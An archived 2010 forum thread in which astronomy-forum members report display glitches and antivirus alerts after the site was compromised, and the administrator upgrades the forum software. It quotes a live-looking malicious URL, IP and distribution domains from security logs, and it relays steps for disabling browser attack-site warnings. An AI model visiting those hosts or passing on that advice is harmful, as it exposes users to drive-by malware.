PDA

View Full Version : Forum access and security problems 2010



Fazor
2010-Mar-29, 07:23 PM
Hmm. I'm currently unable to open threads that have been updated since, oh, about 2:00 or so. I just get a white page that says "Page not found". Old threads that have not been posted to in the last hour or so open fine.

Then I tried to just PM TooSeek since he's online and may know if anything was going on as far as server maintenance, but if I click on a user name to PM someone it says "person has not registered so no profile available". The "Members List" isn't working right either.

So lets see if I can post a thread. Anyone else having issues? If so, you probably won't be able to respond. So I guess that's a pointless question. :)

Fazor
2010-Mar-29, 07:28 PM
Interesting. If I log out, I can view the posts, then log in with the post viewed, and that works. But if I go back to the index then try to view a post, it says "page not found". So it's apparently something to do with my browser history. I suppose I should try clearing cookies.

Edit: Yep. I should have been smart enough to think of that *first*. It was a cookie issue. Like I always say, if it's not chocolate chip, then it's a bad cookie! So I suppose nothing more to see here. Carry on.

Van Rijn
2010-Mar-29, 07:31 PM
Yes, I'm getting the "Page not found" error. I get it with this thread as well.

I can click on the arrow icon by the name of the last person to post in the thread, and read backwards from there.

Fazor
2010-Mar-29, 07:37 PM
It went away completely when I cleared my cookies. *shrug*

Fazor
2010-Mar-30, 01:56 PM
Blah. Now today the little post-indicator icons (such as the arrow, the 'You've posted to this thread', etc) aren't loading, instead replaced by text (saying "Go to first post" "You've posted X times in this thread" etc.) Very distracting. And this time clearing cookies didn't fix it. :-/

megrfl
2010-Mar-30, 02:02 PM
Blah. Now today the little post-indicator icons (such as the arrow, the 'You've posted to this thread', etc) aren't loading, instead replaced by text (saying "Go to first post" "You've posted X times in this thread" etc.) Very distracting. And this time clearing cookies didn't fix it. :-/

Same here.

ToSeek
2010-Mar-30, 02:10 PM
I've had several odd problems last night and this morning: I couldn't log in until I reset my password, and I'm sometimes (but not always) getting text rather than icons.

Argos
2010-Mar-30, 02:20 PM
and I'm sometimes (but not always) getting text rather than icons.

The same here [always getting strings].

Glom
2010-Mar-30, 02:21 PM
We've been attacked!

All kilopians, grab your weapons and Proceed to the South gate. Protect the women and newbies! Mods to your towers. Send these foul beasts into the abyss!

But yeah I've got all that too. It was 404ing on the new posts button. Now none of the icons are loading. I was going to initially blame it on the iGlom.

ToSeek
2010-Mar-30, 02:21 PM
I've emailed and PMed Fraser, but he's on Pacific Time, so it's 7:21 am there, so it may take a while for him to respond.

Fazor
2010-Mar-30, 02:24 PM
I've emailed and PMed Fraser, but he's on Pacific Time, so it's 7:21 am there, so it may take a while for him to respond.

He doesn't have one of those cool red telephones like the President has? What happens if some rouge anti-astronomy faction launches a 15 megaton woo-bomb? *sigh* I just lost what little sense of safety I had left.

;)

slang
2010-Mar-30, 02:30 PM
... some rouge anti-astronomy faction ...

We have ... ways (http://www.at-products.com/cp/upfiles/20051111144302cotton%20pad80a.jpg).. to deal with those!

FWIW, I'm seeing the same, and curiously, wikipedia is also acting funny for me, showing me the article but not in the correct layout. A couple of reloads seems to fix it.

ETA: I noticed BA was online earlier. Maybe he broke it. :)

Tensor
2010-Mar-30, 02:32 PM
It's the LHC. The proton-proton collisions have started and created a black hole that only affects BAUT. Once the Black Hole radiates away through Hawking radiation, everything will return to normal. Or should this go into ATM?

Fazor
2010-Mar-30, 02:35 PM
It's the LHC. The proton-proton collisions have started and created a black hole that only affects BAUT.
Ah, so they've discovered the new element ironyum.

PraedSt
2010-Mar-30, 02:40 PM
Sometimes my icons aren't loading. I'd blamed it on Chrome, but it looks like a BAUT issue.

Strange
2010-Mar-30, 02:56 PM
What happens if some rouge anti-astronomy faction launches a 15 megaton woo-bomb? *sigh* I just lost what little sense of safety I had left.

Are you trying to get round the ban on politics by using a euphemism for the euphemism for Commie?

Fazor
2010-Mar-30, 03:10 PM
Are you trying to get round the ban on politics by using a euphemism for the euphemism for Commie?
Naw, that word has always just been a "finger bender" for me (like "tongue twister" only for typing). I know how to spell it, but it just never comes out right. Let me hit the eChalk board. "Fashionable rogues wear rouge. Fashionable rogues wear rouge. Fashionable rogues wear rouge. . . . " :)

ToSeek
2010-Mar-30, 03:20 PM
Fraser has emailed me back to say he's looking into it.

gzhpcu
2010-Mar-30, 03:51 PM
Today, I get this strange format:

http://img52.imageshack.us/img52/2897/baut.jpg

Any idea what's going on??:confused:

Tensor
2010-Mar-30, 03:59 PM
Fraser's looking into it. It was being discussed in the page not found/user error thread.

Kaptain K
2010-Mar-30, 04:04 PM
Me too! I thought it was on my end, but I ran all my cleanup software, to no avail.

Buttercup
2010-Mar-30, 04:05 PM
The fields showing Online/Offline status, ability to add links or change size/color, Reply, Reply With Quote, View First Unread, Unread etc. are now nothing but white boxes with red dots or x's. :-\

Buttercup
2010-Mar-30, 04:05 PM
Oh wait...now it's all back to normal since I've posted the above. Hmmm.

Veeger
2010-Mar-30, 04:16 PM
FWIW I'm seeing it too. Like there's not enough resources to display icons and images which changes the page formatting.
(But only when I click on a forum and it displays the list of topics - topic posts appear somewhat normal)

mahesh
2010-Mar-30, 04:17 PM
'cup....seems as if it's like a tsunami wave...hasn't reached here yet...i still see the lovely reds and crosses and telling me what you are doing...well, not having a pizza!!!

have a lovely day...it's spitting rain here just now...

jlhredshift
2010-Mar-30, 04:18 PM
sci/tech still messed up

LotusExcelle
2010-Mar-30, 04:24 PM
This happens with my connection from time to time if I'm on a 1x vs an EVDO signal. The page takes too long to load the icons and some of the formatting (which I will assume is CSS but could be very wrong). Not sure of something analogous is happening here to everyone via a server-side issue but it looks the same to me.

Buttercup
2010-Mar-30, 04:28 PM
And now I'm once again back to:
The fields showing Online/Offline status, ability to add links or change size/color, Reply, Reply With Quote, View First Unread, Unread etc. are now nothing but white boxes with red dots or x's. :-\


:lol: Oh well, it's providing a modicum of "excitement." :P

Gillianren
2010-Mar-30, 04:35 PM
All kilopians, grab your weapons and Proceed to the South gate. Protect the women and newbies!

But some of us are women and kilopians! Heck, there are even a few women who are mods! Do we go to our posts or cop out and let you protect us?

Fazor
2010-Mar-30, 04:43 PM
But some of us are women and kilopians! Heck, there are even a few women who are mods! Do we go to our posts or cop out and let you protect us?

You have ren-fair experience. I say we arm you with a mace and a sturdy buckler, and let you have at it. I'll be standing well behind you, probably hiding behind that large oak tree.

megrfl
2010-Mar-30, 04:57 PM
Flat Rate Forums has issued this statement:


Forum administrators now have the ability to pick and choose, a la carte style, the features they would like to use on their forums. For most forums this new option will result in cost savings, forums will be charged according to their selections. Many forums are opting to eliminate icons, a monthly savings of over $99.00.

I think this explains our lack of icons, but at least we still have our smilies. :) :D

captain swoop
2010-Mar-30, 05:07 PM
I have it as well.

Argos
2010-Mar-30, 05:45 PM
Thatīs proprietary software for you. Next step, a total ban on GUI.

tdvance
2010-Mar-30, 05:47 PM
Still messed up for me. This is what I expect to see when the CSS style files aren't loading right for some reason. Why would that happen? improper permissions, corrupted files, disk drive it's on failing, network connection failing (last two only apply if css files on separate server from other stuff).

tdvance
2010-Mar-30, 05:48 PM
wow...that was fast---hit "post reply" and it's back to normal!

BetaDust
2010-Mar-30, 06:14 PM
It still looks pretty messed up from here.

http://img715.imageshack.us/img715/5766/bautbug2.th.jpg (http://img715.imageshack.us/i/bautbug2.jpg/)

But the BAUT mainpage is looking just fine, as is my user CP?

--Dennis

PraedSt
2010-Mar-30, 06:22 PM
The formatting is normal if I use "New Posts" and "Today's Posts". The problem occurs if I go to the various sections.

DrRocket
2010-Mar-30, 06:29 PM
The formatting is normal if I use "New Posts" and "Today's Posts". The problem occurs if I go to the various sections.

The formatting appears to be stochastic.

I hope ToSeek fixes this soon. It is giving me a headache.

astromark
2010-Mar-30, 06:30 PM
Well yes... the Q and A page is gone to, gobble d land... waiting, waiting... Mother told me to be 'Responsible' I do hope this is not my fault... :)but this page looks fine.

ToSeek
2010-Mar-30, 06:43 PM
Fraser is aware of the situation and is looking into it.

EDG
2010-Mar-30, 07:00 PM
Weird, I was getting the same 'text replacing images' issue, logged out and logged back in and it was still there. Then just now I posted a reply and it's all suddenly gone back to normal again.

EDIT: And I closed the browser, came back onto BAUT later, and it's back to "text replacing images" again. Weird.

PraedSt
2010-Mar-30, 07:32 PM
WARNING

My antivirus keeps freaking out whenever I access BAUT. Something about a Trojan.

megrfl
2010-Mar-30, 07:35 PM
Me too!

Risk Name: HTTP - Neosploit Activity 3 (whatever that means)

Severity - HIGH

PraedSt
2010-Mar-30, 07:37 PM
Details:

File name: http://searchimagweb.org/cgi-bin/088\{gzip}
Malware name: JS:Prontexi-AA [Trj]
Malware type: Trojan Horse
VPS version: 100328-0, 03/28/2010

I have no idea what any of that means, but it sounds nasty.

jlhredshift
2010-Mar-30, 07:50 PM
McAfee says that this website has been reported as unsafe.

megrfl
2010-Mar-30, 07:52 PM
I get the message everytime I move from one place to another within BAUT.

Moose
2010-Mar-30, 07:52 PM
Yup. Me too. "HTML/Infected.WebPage.Gen HTML script virus".

Veeger
2010-Mar-30, 07:58 PM
Ah crap. Welcome back indeed. :lol:

pzkpfw
2010-Mar-30, 08:03 PM
I have Microsofts own filter telling me I ought not be here...

publius
2010-Mar-30, 08:04 PM
I don't know what happened, but Norton Internet Security here has started going crazy every time I log into BAUT today, blocking things as threats.

It reports the threat as "HTTP Neosploit Activity 3" and the "attacker URL" as something coming from "searchimagweb.org" with some long string in the URL that is says matches the signature of the attack. The IP address for that is 91.212.127.26.

When Norton blocks that, just about all the graphic buttons on the BAUT page fail to load. I don't know if anything is really wrong, or just by some chance some URL string happened to match a known attack signature.


-Richard

jlhredshift
2010-Mar-30, 08:05 PM
Ah crap. Welcome back indeed. :lol:

Let's see, everything is nice and quiet and somewhat boring, you come back, and the stuff hits the fan. Hmmm..... :whistle:

tdvance
2010-Mar-30, 08:07 PM
I'm still getting the (intermittent) style errors, but no virus messages---it could be because I use Adblock+ and some ad has something not so nice in it.

Veeger
2010-Mar-30, 10:28 PM
Let's see, everything is nice and quiet and somewhat boring, you come back, and the stuff hits the fan. Hmmm..... :whistle:

I know. I was getting paranoid so I just completed a scan and actually found something. Fortunately it was not related to this forum trouble. It was a fake antivirus link on an alternate user profile.

andyschlei
2010-Mar-30, 10:29 PM
I still don't get icons on the forum index pages.

And on some threads I don't have the formatting icons on the quick reply where on some I do.

Strange. I think the icons have to be worth $99/month.

slang
2010-Mar-30, 10:34 PM
As ToSeek said: Fraser is working on it, it may take some time to get everything fixed. Fortunately the problems seem to appear to everyone, so it's easy for him to see if it's fixed yet, or not.

kleindoofy
2010-Mar-30, 11:44 PM
Cool, an all new BAUT.

I volunteer to test the naughty word filter. :whistle:

(some of the smilies still seem to be broken)

Van Rijn
2010-Mar-30, 11:53 PM
Well, this looks different. It's going to take time to get used to the new look.

publius
2010-Mar-30, 11:57 PM
Wow, things have really changed now. :) Upgraded to v4, huh. But I'm not getting the security warning anymore.

For what it's worth, looking at Norton logs, it looks like it thought something on BAUT was causing the browser here to send an attack URL string to the "searchimagweb.org" site.

Googling on "Neosploit", I see that looks nasty -- tries to install a boot sector infector that loads a rootkit. I'm not infected (well, scans say I'm not), but that was scary there for a while.

-Richard

Fraser
2010-Mar-31, 12:03 AM
So you're not getting the warnings any more? Please let me know if you see them. I'm hoping the upgrade removed the exploit opening.

LaurelHS
2010-Mar-31, 12:07 AM
When I click on "find all posts," in my profile, I get a "sorry, no matches" message.

Fraser
2010-Mar-31, 12:08 AM
I'm still rebuilding all the post tables. That's going to take several hours. After that it should work.

The Backroad Astronomer
2010-Mar-31, 12:12 AM
I blame the LHC, the end of the world has began!!!!!

publius
2010-Mar-31, 12:15 AM
Fraser,

No, Norton is giving no warnings now, thank goodness.

If it will help, he's a log entry from one of the alerts Norton reported:



3/30/2010 4:12 PM,High,An intrusion attempt by OSIRIS was blocked.,Blocked,No Action Required,HTTP Neosploit Activity 3,"OSIRIS (192.168.2.50, 5497)",searchimagweb.org/cgi-bin/088/t002106Rfc7d74b4Xc4f26b45Y8f4393b4Z0100f070201L656 e2d75730000000000,"searchimagweb.org (91.212.127.26, 80)",192.168.2.50 (192.168.2.50),"TCP, Port 5497",


OSIRIS is the name of this machine, and the 192.168... is the private IP on the LAN side of my router (shouldn't be any danger in posting that, of course). Note the long URL directed at "searchimagweb.org" -- that was what matched the "Neosploit" signature. The hack was trying to trigger the browser to send that and that's when Norton threw the red flag. Each time, the TCP source port, 5497 above, was something different, but the attacker URL was the same.

Cougar
2010-Mar-31, 12:17 AM
It's the LHC. The proton-proton collisions have started and created a black hole that only affects BAUT. Once the Black Hole radiates away through Hawking radiation, everything will return to normal. Or should this go into ATM?

Had to stop here and say....

Oh, that is funny!

The Backroad Astronomer
2010-Mar-31, 12:19 AM
oops didn't see tensors earlier joke.

Cougar
2010-Mar-31, 12:27 AM
Yeah, cool new look. Very, uh, 'spacey'. :) Though I take it this wasn't a planned conversion?

LotusExcelle
2010-Mar-31, 12:40 AM
Not sure I'm a fan. The other setup was certainly utilitarian and I mean that as a compliment. This new design is streamlined in the same sense Vista is and I mean that in a bad way.

astromark
2010-Mar-31, 12:41 AM
It was not me, I did not do it. So to who did... Ya it looks good. Great, good on you... I get this from a 'V-Bulletin' whoever that is and that does not seem to have changed... I like the 'new' look but wonder why... If its not broken do not fix it. But this thinking might have more to do with me being conservative and older....:)be encouraged.
Here in NZ the largest telecommunication network 'telecom' introduced a whole NEW 'XT' network. Oh My... what a mess... its fallen over four times in two months... all sorts of running for cover... people are running away faster than a flood. Your problems are little'er... :):eh:

kleindoofy
2010-Mar-31, 12:55 AM
... but wonder why... If its not broken do not fix it. ...
That's the whole point.

It was broken.

So instead of re-installing the old version (with a possible security leak which broke it in the first place), they did an upgrade.

Everybody will get used to it pretty quicky and the old one will appear "old fashioned" in no time at all.

The Backroad Astronomer
2010-Mar-31, 01:06 AM
But there will be a lot of complaining until they are use to it.

EDG
2010-Mar-31, 01:08 AM
Is there a way (or will there be?) to change the skin used on the forum on an individual basis? I guess right now the default skin is installed, I had a look through my user profile and couldn't find an obvious way to change it.

LotusExcelle
2010-Mar-31, 01:09 AM
The virus mentioned, from my own digging (could be wrong) was sent via an embedded ad. i.e. the server was never broken and most likely the issue was that we all, literally, had a virus that was causing the issue. I very much doubt their server is running a windows-virus-vulnerable system.

Grashtel
2010-Mar-31, 01:12 AM
Not sure I'm a fan. The other setup was certainly utilitarian and I mean that as a compliment. This new design is streamlined in the same sense Vista is and I mean that in a bad way.
Hopefully Frazier is working on getting the templates for the BAUT look fixed and updated for vB4 so this is just a temporary solution due to the hack and emergency upgrade.

publius
2010-Mar-31, 01:14 AM
I absolutely hate change myself (that happens as you get older :) -- I tried to fight it, but now I'm embacing my ornery oldmaness coming on), but we'll get used to it. The old software was vulnerable to some hacker exploit. Lord, I hate malware author/hackers, and I hate that worse than change. :)

-Richard

Grashtel
2010-Mar-31, 01:14 AM
The virus mentioned, from my own digging (could be wrong) was sent via an embedded ad. i.e. the server was never broken and most likely the issue was that we all, literally, had a virus that was causing the issue. I very much doubt their server is running a windows-virus-vulnerable system.
That is true but the server needed to be hacked to embed the malware ad into the pages in the first place so that needed to be fixed as well to prevent it happening again.

Swift
2010-Mar-31, 01:52 AM
Might I suggest that if you have suggestions about the software upgrade, that you put them in this thread (http://www.bautforum.com/showthread.php/102554-vBulletin-4-upgrade) and leave this one for the bug reports from earlier in the day. Thanks,

01101001
2010-Mar-31, 01:58 AM
Might I suggest that if you have suggestions about the software upgrade, that you put them in this thread (http://www.bautforum.com/showthread.php/102554-vBulletin-4-upgrade) and leave this one for the bug reports from earlier in the day. Thanks,

Am I colorblind or is that a case of too little contrast between the purple text and blue link (on my display in my lighting conditions)? Even if I am colorblind, those colors are not friendly to some eyes.

Fraser
2010-Mar-31, 02:11 AM
My guess is that the exploit came with a vulnerability in vBulletin. Some new hack was discovered and it was implemented by some bot that scans the web looking for vulnerable sites. By upgrading to version 4, it would remove all the old exploit vulnerabilities. The server is Linux, and it's unlikely that the attack happened deeper in the Operating System.

That said, I'm going to be moving the site to a new server in the next couple of days, so that should resolve any possible vulnerabilities in the OS.

astromark
2010-Mar-31, 05:26 AM
So it was busted and has been fixed... You's are good for it.

I said that if it ain't broken don't... well it was and you did... Great... I am unaware of the timing of all of this... I sleep while you fix :) thank you.

HenrikOlsen
2010-Mar-31, 12:32 PM
The virus mentioned, from my own digging (could be wrong) was sent via an embedded ad. i.e. the server was never broken and most likely the issue was that we all, literally, had a virus that was causing the issue. I very much doubt their server is running a windows-virus-vulnerable system.
The hack with changes to the files on the server had been confirmed by Fraser, the virus that came with the ads replacing the usual ones were just a symptom.
The bit I noticed was that the icons had stopped working in all the sub-fora because the modified template referred to them with a relative link and this made their address wrong.
This I confirmed as being an actual problem by accessing the site directly without a browser (wget is your friend).

Glom
2010-Mar-31, 12:35 PM
I was on dirty BAUT on my iPhone, home PC and laptop. It looks like Norton protected my home PC. My laptop is supposed to be protected by McAfee but it hasn't told me about anything. I don't know what has protected my iPhone. Is the iPhone vulnerable to such an attack?

Metricyard
2010-Mar-31, 01:04 PM
My avast goes crazy until I log in. Once I've logged on the warnings go away.
But If I log off, The warnings come back.

As a matter of fact, If I log off, I get an iframe error.

Guess I'll just stay logged in.

Tensor
2010-Mar-31, 01:05 PM
I was on dirty BAUT on my iPhone, home PC and laptop. It looks like Norton protected my home PC. My laptop is supposed to be protected by McAfee but it hasn't told me about anything. I don't know what has protected my iPhone. Is the iPhone vulnerable to such an attack?

I would say the Iphone isn't. It doesn't use a Windows based OS. I didn't get any warnings yesterday on my Mac, after being on BAUT.

What I do find funny, is my wife, right after we got the Mac, hit one of those click here to check for virus things. It told her all of our file were infected. But of course they were. They weren't in any recognized PC format.

Fazor
2010-Mar-31, 01:45 PM
It looks like one of those nasty faux anti-virus virus' got through here yesterday, and cropped up this morning. Our company forces us to use McAffee . . . which IMHO is the worst, most useless, yet most resource demanding piece of junk there is. We've had probably a dozen viruses on the handful of office machines we have. To my knowledge, it's never actually stopped anything. Oh well.

I did a hard shut down the second the faux anti-virus window popped up, booted into safe mode, and did a system restore to the end of last week, just in case. When completed, I was given a list of a few dll files that had been changed between the two system points, so I deleted the old (as in prior to restored) versions, just in case. In my experience with this type of infection, they can worm their way into your restore points too. It hasn't popped up again yet, knock-on-wood, so we'll see.

eburacum45
2010-Mar-31, 02:08 PM
I'm still getting lots of virus warnings, incidentally.

closetgeek
2010-Mar-31, 02:26 PM
Fazor, my daughter got that virus scan virus on her netbook, she thought it was avast telling her that so she let it run, then came to me and told me that her netbook is wasted.

As for BAUT, as soon as the page loaded, I would get sent to a different page, telling me that this site is unsafe. I sent out a report to microsoft and then told it to let me on anyway. Neat new system, though.

Fazor
2010-Mar-31, 02:31 PM
Fazor, my daughter got that virus scan virus on her netbook, she thought it was avast telling her that so she let it run, then came to me and told me that her netbook is wasted.

I had to clean that off a home machine, off my parent's laptop, and off a different computer here at work (each different occasions). It can be beaten, but man was it a helluva fight each time. Actually, come to think of it, I only personally disinfected my machine and my parents'. The other one at work was in the other office, and I sure wasn't up to trying to do that over the phone via the boss, who is exceptionally computer illiterate. They just called in an outside IT guy to fix that.

mugaliens
2010-Apr-01, 05:46 AM
I use Norton 360, and haven't had any issues either before or after the upgrade.

NEOWatcher
2010-Apr-01, 11:56 AM
I got that yesterday morning. It seems clear now, but not after it took our PC support people over 7 hours to get rid of it.
Nasty one - it wouldn't allow any applications to run. It had to be cleaned in safe mode. Trend didn't catch it, and it was cleaned with Malwarebytes.

JohnD
2010-Apr-01, 12:59 PM
JS:Prontexi - Ad infiltration malware.
See: http://blog.avast.com/2010/02/18/ads-poisoning-%e2%80%93-jsprontexi/

The other was a 'common trojan', perhaps an opportunist infection, but bith are new, and rasie significnat fears about advertising on boards.
John

Fraser
2010-Apr-01, 03:08 PM
My son installed that virus on our Windows laptop about 2 months ago. I know a lot about computers, and it still took me about 3 hours to figure out how fiendish that virus was.

Fazor
2010-Apr-01, 03:58 PM
Yeah, the one that hit me here yesterday had a different twist than the one's I'd dealt with in the past; I couldn't run task manager to kill processes (which was really the first thing I tried to do when the fake AV window popped up.) It gave an error and said that application had been locked by the administrator. Realizing how bad that could get, I did the hard shut-down (hold the power button. I didn't want to hit the shut-down button because I've seen that even give signals to viruses to replicate themselves before the processes shut down).

But as I mentioned yesterday, a quick system-restore to a few days prior worked, or at least appeared to work. Still no more problems . . . knock-on-wood.

Siguy
2010-Apr-04, 02:12 PM
When I visited today I got a Firefox red warning page saying that it was a reported attack site. I chose to ignore the warning, but I'm wondering if we're still having security issues?
EDIT:
Of the 2 pages we tested on the site over the past 90 days, 0 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2010-04-03, and suspicious content was never found on this site within the past 90 days.
So basically, we're not being hacked or anything, yet Google's listing us as suspicious? How does that work out?

Veeger
2010-Apr-04, 02:37 PM
FWIW, I have seen script bugs and malware links being installed on other servers as well. I thought it was PHPBB group problem but apparently not.

ToSeek
2010-Apr-04, 02:44 PM
Fraser thinks he has found and fixed the issue - some files got carried over to the new server that shouldn't have been.

gzhpcu
2010-Apr-04, 03:13 PM
I still get the message... :-(

Fraser
2010-Apr-04, 03:19 PM
It could be a delayed thing, where the attack is registered with them, and it takes time to go away.

Moose
2010-Apr-04, 03:41 PM
You'll need to follow the instructions on http://www.stopbadware.org/home/reviewinfo to request a review, once things are definitively fixed. It won't fall off on its own as far as I can tell.

Drunk Vegan
2010-Apr-04, 04:25 PM
Trying to load Bautforum gives me this message in FireFox: http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=http://www.bautforum.com/usercp.php The entire layout is messed up (no frames, GUI looks bad, everything vertical, etc). Is this just a result of the transfer to the new server, or is Firefox correct and someone's taken advantage of a bug to plant malware on the site?

Moose
2010-Apr-04, 04:37 PM
Disabling Firefox’s badware website warnings will increase your risk of having your computer infected by drive-by downloads and other badware. If you are willing to accept this risk, you may disable the warnings in the Firefox options/preferences by clicking the Security option, unchecking “Block reported attack sites,” and clicking OK.

I don't necessarily recommend doing this, and if you do, remember to bring it back up once this is resolved. But if it's an unacceptable annoyance and you have other means of detecting problems, then it's an option.

Arneb
2010-Apr-04, 04:41 PM
Well, it's a sad thing to say, but there is always IE to view the forum...

EDG
2010-Apr-04, 04:42 PM
This is what I got just now:


Reported Attack Site!

This web site at www.bautforum.com has been reported as an attack site and has been blocked based on your security preferences.

Attack sites try to install programs that steal private information, use your computer to attack others, or damage your system.

Some attack sites intentionally distribute harmful software, but many are compromised without the knowledge or permission of their owners.


What is the current listing status for bautforum.com?

Site is listed as suspicious - visiting this website may harm your computer.

What happened when Google visited this site?

Of the 98 pages that we tested on the site over the past 90 days, 0 page(s) resulted in malicious software being downloaded and installed without user consent. The last time that Google visited this site was on 2010-04-03, and suspicious content was never found on this site within the past 90 days.

This site was hosted on 2 network(s) including AS36351 (SOFTLAYER), AS33070 (RMH).

Has this site acted as an intermediary resulting in further distribution of malware?

Over the past 90 days, bautforum.com did not appear to function as an intermediary for the infection of any sites.

Has this site hosted malware?

No, this site has not hosted malicious software over the past 90 days.

How did this happen?

In some cases, third parties can add malicious code to legitimate sites, which would cause us to show the warning message.

Next steps:

* Return to the previous page.
* If you are the owner of this website, you can request a review of your site using Google Webmaster Tools. More information about the review process is available in Google's Webmaster Help Centre.

Updated 32 hours ago

It's essentially making the site unusable in Firefox, and I'm not switching to IE permanently or comprimising my security settings in Firefox just to read BAUT. I'd recommend switching back to the temporary server until this is sorted out.

01101001
2010-Apr-04, 04:47 PM
Turned it off in Safari :: References :: Security

It's no fun clicking "ignore warning" and "yes I'm sure" buttons for every single page displayed.

Check your own browser for methods of disabling the warning -- unless you believe the warning is valid.

ShadowSot
2010-Apr-04, 04:53 PM
Currently working fine under Google Chrome.

Veeger
2010-Apr-04, 05:21 PM
Works ok under Chrome, but Google is flagging it. "This site will harm your computer..."

peter eldergill
2010-Apr-04, 06:02 PM
Funny it was working for me fine earlier today on Firefox but now its not. I'm getting the same warnings as above.

Pete

Fraser
2010-Apr-04, 06:32 PM
The thing that was generating the virus warnings is gone. I'm not sure what it's going to take to convince every virus scanner that everything's fine again, since they're clearly not checking in real time.

I'm guessing we just need to wait.

TampaDude
2010-Apr-04, 06:36 PM
Yeah, I just sent feedback to the Admins...twice, actually, because the first try got blocked...I'm still getting the messages and have turned off blocking for now.

DrRocket
2010-Apr-04, 06:37 PM
The thing that was generating the virus warnings is gone. I'm not sure what it's going to take to convince every virus scanner that everything's fine again, since they're clearly not checking in real time.

I'm guessing we just need to wait.

My several sentinels do not report any problems. But Google does. Apparently you, as owner of the forum can request a review of the site to eliminate this warning on Google. http://www.google.com/interstitial?url=http://www.bautforum.com/

Glom
2010-Apr-04, 06:48 PM
Chrome blocked the site. I had to override just to get here. I checked the Safe Browsing (http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http://www.bautforum.com/&client=googlechrome&hl=en-GB), which said actually nothing was wrong apart from the fact the domain was on the evil list. Norton hasn't flagged anything up though, which is a bit like not smelling hydrogen sulphide. Either there's no hydrogen sulphide or you have two minutes to live.

Glom
2010-Apr-04, 06:51 PM
I'm getting it on Chrome, though once I'm in, I can move around freely.

Fraser
2010-Apr-04, 07:23 PM
Okay great, I've submitted to Google for them to review it.

chrissy
2010-Apr-04, 07:50 PM
So far I am working fine here. Avast hasn't picked anything up, last night I had all popups blocked when clicking on a link from anyone though, I haven't tried it today.

kleindoofy
2010-Apr-04, 08:44 PM
Okay great, I've submitted to Google for them to review it.
Isn't it great to have the reputation of your site subject to the whims of some PFY at Google?

There's good and bad in everything.

Fraser
2010-Apr-04, 09:12 PM
It's things like Avast which are checking the site in real time which are very useful in this situation. So if that warning pops up again, please let me know.

clint
2010-Apr-04, 09:31 PM
Well, it's a sad thing to say, but there is always IE to view the forum...

With Chrome I can surf around the forum, but get the warning when I try to submit a post...
(also when trying to add a smiley)

HenrikOlsen
2010-Apr-04, 09:40 PM
Of the 107 pages we tested on the site over the past 90 days, 3 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2010-04-04, and the last time suspicious content was found on this site was on 2010-04-04.
Malicious software includes 2 trojan(s). Successful infection resulted in an average of 3 new process(es) on the target machine.

Malicious software is hosted on 1 domain(s), including cz.cc/.

1 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including buert.net/.

This site was hosted on 2 network(s) including AS36351 (SOFTLAYER), AS33070 (RMH).

Looks like you should have another look at what got copied over from the old site:(

publius
2010-Apr-04, 10:09 PM
I'm getting no warnings here at all. I just installed the latest version of Firefox after reading this thread, and doesn't give any warnings here. Norton hasn't complained at all since the move.

-Richard

Jeff Root
2010-Apr-04, 10:14 PM
I got the same message from Firefox when I tried to get on three or four hours ago.
There was no problem getting the main page. The first thing I did was click on the
"Settings" button to view the list of subscribed threads with new posts, and the
message window came up. Clicking on the tiny little "Ignore" link brought up a
largish pop-up window. I forget what message it had. Underneath it was what
appeared to be either the BAUT main page or my settings page, but completely
without graphics or formatting of any kind, so I would have had to scroll down and
read it carefully to identify which page it was. I gave up instead.

Did anyone else get that second pop-up window? What was it?

Currently using IE 5.5 under Windows 98 SE!

-- Jeff, in Minneapolis

publius
2010-Apr-04, 10:16 PM
Whoops. Spoke too soon. It must take a while for the security stuff to "propagate" somehow with a new installation. The second time I fired up Firefox and loaded it BAUT, it popped up the "attack site!" warning. :)

-Richard

Rhaedas
2010-Apr-04, 10:20 PM
It's too bad there's not an exemptions button next to the Report Attack Site in the Options, like there is one for the Addons just above it. That way when you first click on the "This isn't an attack site" on the red warning at the top, it would let you take the domain off your personal list.

Since it's not a threat, going back to IE isn't a problem directly, if you just use it for BAUT, but it's a bit like turning the firewall off, or taking a warning light out, or sticking the penny in the old fuse box. You can use IE...I won't touch the thing. :p

Jeff Root
2010-Apr-04, 11:11 PM
Since Richard reported that the warning is still coming up, I disconnected and
moved the phone cord back over to the other modem in the other computer,
with FireFox, to test it again.

What I remembered as a second pop-up window was just the window I got
when I clicked on the link in the red area above the BAUT page, saying "This
isn't an attack site", thinking that it would then be treated normally. What I
got was a page at stopbadware.org. I closed that. The BAUT page was the
BAUT main page, and it did have the graphics, after all, and the fonts, but
no layout of any kind, and no colors -- which was nice compared to the
current colors....

I then cleared the history, cookies, cache, and everything from inside FoxFire,
and rebooted. The icon beside my entry for BAUT in favorites had reverted
from the red exclamation mark to the vBulletin logo... which should have made
me think, but I missed the implication, which I'll get to in just a moment.
Going to BAUT again gave the warning message. It said that BAUT was last
checked "13 hours ago".

The implication of the vBulletin icon in my Favorites list was what I next found,
that the drop-down list under History still had all the websites I had visited.
Was the history really cleared? Doesn't look like it. Were cookies really cleared?
I either failed to notice or don't remember if BAUT recognized me when I called
back after telling FoxFire to clear everything. I'll have to try again....

-- Jeff, in Minneapolis

Jeff Root
2010-Apr-04, 11:24 PM
Okay, there was a reason FireFox didn't clear the History and cookies.
There is a dropdown selection box that I didn't notice, "Time range to clear",
which has a default of "Last Hour". I changed that to "Everything", which
appears to have done what I thought I did the first time.

-- Jeff, in Minneapolis

DrRocket
2010-Apr-05, 12:38 AM
i'm running IE8 and get no warnings.

I also get no warnings and find nothing with sweeps with McAfee, Spysweeper, Windows Defender, or AdAware.

But if I search for BAUT on Google and then try to enter from there I get a warning.

It seems to me that this indicates that the site is clean, and Google is behind the times.

publius
2010-Apr-05, 01:42 AM
i'm running IE8 and get no warnings.



Firefox uses some online database -- Google's I think -- of bad sites, and IE doesn't.

I booted my install of Fedora 12 Linux, which uses Firefox, and sure enough, the warning came up there as well. And Firefox must indeed go into some sort of lockdown mode when you click to go the site anyway, as none of the graphics come up at all.

-Richard

Grashtel
2010-Apr-05, 02:13 AM
Isn't it great to have the reputation of your site subject to the whims of some PFY at Google?

There's good and bad in everything.
Most likely not even a PFY, just a computer that does the job automagically.

TheHalcyonYear
2010-Apr-05, 05:31 AM
